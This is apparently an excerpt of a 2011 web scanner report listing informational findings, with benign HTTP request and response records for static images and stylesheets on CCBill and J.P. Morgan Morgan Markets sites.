HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:05 GMT Last-Modified: Wed, 29 Jul 2009 00:07:17 GMT ETag: "1679087-913-46fccf8 Accept-Ranges: bytes Content-Length: 2323 Keep-Alive: timeout=5, max=70 Connection: Keep-Alive Content-Type: image/png Set-Cookie: TSc23f25=a0a841a24f7 .PNG . ...IHDR..............M..... <x:xmpmeta xmln ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /style/images/email_icon |
GET /style/images/email_icon Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:10 GMT Last-Modified: Mon, 24 Aug 2009 20:31:51 GMT ETag: "137b6e-2f2-471e91b965bc0 Accept-Ranges: bytes Content-Length: 754 Keep-Alive: timeout=5, max=68 Connection: Keep-Alive Content-Type: image/png Set-Cookie: TSc23f25=a0a841a24f7 .PNG . ...IHDR................a... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /style/images/exclamation |
GET /style/images/exclamation Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:05 GMT Last-Modified: Tue, 28 Jul 2009 22:35:58 GMT ETag: "40502-320-46fcbb1bf6f80" Accept-Ranges: bytes Content-Length: 800 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: image/png Set-Cookie: TSc23f25=a0a841a24f7 .PNG . ...IHDR................a... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /style/images/s.gif |
GET /style/images/s.gif HTTP/1.1 Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:00 GMT Last-Modified: Mon, 12 Jan 2009 22:39:35 GMT ETag: "4047f-2b-46050c7f1b7c0" Accept-Ranges: bytes Content-Length: 43 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /style/images/section_bg |
GET /style/images/section_bg Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:00 GMT Last-Modified: Thu, 04 Dec 2008 21:48:04 GMT ETag: "58041a-4fc-45d3f83e52d00 Accept-Ranges: bytes Content-Length: 1276 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/png Set-Cookie: TSc23f25=a0a841a24f7 .PNG . ...IHDR..............T*=... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /style/images/warning |
GET /style/images/warning Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:10 GMT Last-Modified: Thu, 20 Aug 2009 00:04:21 GMT ETag: "420983-c123-471877e Accept-Ranges: bytes Content-Length: 49443 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: image/png Set-Cookie: TSc23f25=a0a841a24f7 .PNG . ...IHDR...............U^... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://affiliateadmin |
Path: | / |
GET / HTTP/1.1 Host: affiliateadmin.ccbill.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:23 GMT Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: TSd1de36=d97ed8a5088 Content-Length: 3183 <html> <head> <link rel="stylesheet" href="/ccbill.css"> <title>CCBill.com Affiliate Admin</title> </head> <body> <table border="0" class="OuterLogin" width="100%" height="100%"> <tr> <td ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://affiliateadmin |
Path: | /ccbill.css |
GET /ccbill.css HTTP/1.1 Host: affiliateadmin.ccbill.com Connection: keep-alive Referer: https://affiliateadmin User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:23 GMT Last-Modified: Mon, 24 Sep 2007 20:23:40 GMT ETag: "40dd6-4266-43ae76567cb00 Accept-Ranges: bytes Content-Length: 16998 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/css Set-Cookie: TSd1de36=d97ed8a5088 BODY { scrollbar-face-color: #3876b3; scrollbar-highlight-color scrollbar-3dlight-color: #cccccc; scrollbar-darkshadow s ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://affiliateadmin |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: affiliateadmin.ccbill.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:25 GMT Last-Modified: Thu, 28 Jun 2007 17:58:59 GMT ETag: "e7d61-1-433fb1df13ec0" Accept-Ranges: bytes Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain; charset=ISO-8859-1 Set-Cookie: TSd1de36=d97ed8a5088 |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /css/menu.css |
GET /css/menu.css HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:47 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"5331-1310119392000" Last-Modified: Fri, 08 Jul 2011 10:03:12 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:47 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 5331 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css #jpmmenu { height: 27px; width: 100%; position: relative; font-family: arial; font-size: 11px; z-index: 500; clear: both; } #jpmmenu .select { margin: 0; padding: 0; list-style ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /css/morganmarkets.css |
GET /css/morganmarkets.css HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:49 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"54402-1310119390000" Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:49 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 54402 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css /* start jpm base css changes */ body { margin: 0; } ul li { list-style: none outside none; } th,td { border: none; } /* end jpm base css changes */ /* start jpm reset-fonts-grids ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /css/yui/base.css |
GET /css/yui/base.css HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:47 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"917-1310119390000" Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:47 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 917 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css /* Copyright (c) 2010, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo version: 2.8.1 */ body{margin:10px;}h1{font ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /css/yui/button.css |
GET /css/yui/button.css HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:53 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"3664-1310119390000" Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:53 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 3664 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css /* Copyright (c) 2010, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo version: 2.8.1 */ .yui-button{display:-moz ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /css/yui/container.css |
GET /css/yui/container.css HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:54 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"4781-1310119390000" Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:54 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 4781 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css /* Copyright (c) 2010, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo version: 2.8.1 */ .yui-overlay,.yui-panel ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /css/yui/reset-fonts |
GET /css/yui/reset-fonts Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:53 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"5745-1310119390000" Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:53 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 5745 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css /* Copyright (c) 2010, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo version: 2.8.1 */ html{color:#000 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /css/yui/sprite.png |
GET /css/yui/sprite.png HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:30:26 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"4761-1310119390000" Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT Cache-Control: max-age=3600 Expires: Tue, 12 Jul 2011 17:30:26 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 4761 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/png .PNG . ...IHDR...(............M... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /css/yui/tabview.css |
GET /css/yui/tabview.css HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:55 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"6532-1310119390000" Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:55 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 6532 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css /* Copyright (c) 2010, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo version: 2.8.1 */ .yui-navset .yui-nav li,.yui-navset .yu ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /css/yui/treeview.css |
GET /css/yui/treeview.css HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:53 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"5077-1310119390000" Last-Modified: Fri, 08 Jul 2011 10:03:10 GMT Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:34:53 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 5077 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/css /* Copyright (c) 2010, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://developer.yahoo version: 2.8.1 */ table.ygtvtable{margin ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 302 Found Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:30:00 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Location: https://iblogin.jpmorgan Cache-Control: max-age=300 Expires: Tue, 12 Jul 2011 16:35:00 GMT Vary: Accept-Encoding Content-Length: 361 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://iblogin ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /images/JPM_logo.gif |
GET /images/JPM_logo.gif HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:57 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"1863-1310119380000" Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT Cache-Control: max-age=432000 Expires: Sun, 17 Jul 2011 16:29:57 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 1863 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89aa......='.@+ Q<2_J@........y...P;1}j`. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /images/Morgan_Markets |
GET /images/Morgan_Markets Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:57 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"2594-1310119380000" Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT Cache-Control: max-age=432000 Expires: Sun, 17 Jul 2011 16:29:57 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 2594 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a..........rsvwx ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /images/backgrounds/btn |
GET /images/backgrounds/btn Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:30:26 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"177-1310119380000" Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT Cache-Control: max-age=3600 Expires: Tue, 12 Jul 2011 17:30:26 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 177 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/png .PNG . ...IHDR..............}2.... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /images/btn_center_bg.gif |
GET /images/btn_center_bg.gif HTTP/1.1 Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:29:57 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"138-1310119378000" Last-Modified: Fri, 08 Jul 2011 10:02:58 GMT Cache-Control: max-age=432000 Expires: Sun, 17 Jul 2011 16:29:57 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 138 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a................... |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /images/btn_hover_center |
GET /images/btn_hover_center Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
HTTP/1.1 200 OK Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT Date: Tue, 12 Jul 2011 16:30:25 GMT Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31 Accept-Ranges: bytes ETag: W/"87-1310119380000" Last-Modified: Fri, 08 Jul 2011 10:03:00 GMT Cache-Control: max-age=432000 Expires: Sun, 17 Jul 2011 16:30:25 GMT Vary: Accept-Encoding P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE" Content-Length: 87 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.........?..[..N..G |
Severity: | Information |
Confidence: | Certain |
Host: | https://mm.jpmorgan.com |
Path: | /images/btn_hover_left |
GET /images/btn_hover_left Host: mm.jpmorgan.com Connection: keep-alive Referer: https://mm.jpmorgan.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=214076236 |
